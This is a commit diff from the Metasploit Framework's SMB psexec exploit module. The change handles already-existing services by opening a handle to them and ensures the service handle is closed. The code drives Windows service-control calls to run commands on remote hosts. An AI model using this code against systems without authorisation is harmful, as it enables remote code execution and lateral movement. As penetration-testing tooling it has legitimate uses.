Check for a valid handle

If service already exists open a handle. If we have a valid handle ensure we try and close it.
2014-03-19 12:44:31 +00:00 · 2014-03-19 12:44:31 +00:00 · 71818b59d1
parent fcc5cfb155
commit 71818b59d1
1 changed files with 52 additions and 22 deletions
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@ -15,6 +15,9 @@ module Exploit::Remote::SMB::Psexec
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Authenticated

+  ERROR_SERVICE_EXISTS = 0x431
+  NULL_HANDLE = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
  # Retrives output from the executed command
  #
  # @param smbshare [String] The SMBshare to connect to.  Usually C$
@ -91,18 +94,42 @@ module Exploit::Remote::SMB::Psexec
      response = dcerpc.call(0x0c, stubdata)
      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
        svc_handle = dcerpc.last_response.stub_data[4,20]
-        svc_status = dcerpc.last_response.stub_data[24,4]
+        svc_status = dcerpc.last_response.stub_data[24,4].unpack('V').first
      end
    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
      print_error("#{peer} - Error creating service: #{e}")
      return false
    end

+    if svc_handle == NULL_HANDLE
+      if svc_status == ERROR_SERVICE_EXISTS
+        vprint_status("#{peer} - Service already exists, opening a handle...")
+        begin
+          stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF)
+          response = dcerpc.call(0x10, stubdata)
+          if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+            svc_handle = dcerpc.last_response.stub_data[0,20]
+          end
+        rescue Rex::Proto::DCERPC::Exceptions::Fault => e
+          print_error("#{peer} - Error opening service: #{e}")
+          return false
+        end
+      else
+        print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}")
+        return false
+      end
+    end
+
+    if svc_handle == NULL_HANDLE
+      print_error("#{peer} - No service handle retrieved")
+      return false
+    else
+      begin
        vprint_status("#{peer} - Starting the service...")
        stubdata = svc_handle + NDR.long(0) + NDR.long(0)
        begin
          response = dcerpc.call(0x13, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+          if dcerpc.last_response and dcerpc.last_response.stub_data
          end
        rescue Rex::Proto::DCERPC::Exceptions::Fault => e
          print_error("#{peer} - Error starting service: #{e}")
@ -112,17 +139,20 @@ module Exploit::Remote::SMB::Psexec
        stubdata = svc_handle
        begin
          response = dcerpc.call(0x02, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+          if dcerpc.last_response and dcerpc.last_response.stub_data
          end
        rescue Rex::Proto::DCERPC::Exceptions::Fault => e
          print_error("#{peer} - Error removing service: #{e}")
        end
+      ensure
        vprint_status("#{peer} - Closing service handle...")
        begin
          response = dcerpc.call(0x0, svc_handle)
        rescue Rex::Proto::DCERPC::Exceptions::Fault => e
          print_error("#{peer} - Error closing service handle: #{e}")
        end
+      end
+    end

    if disconnect
      sleep(1)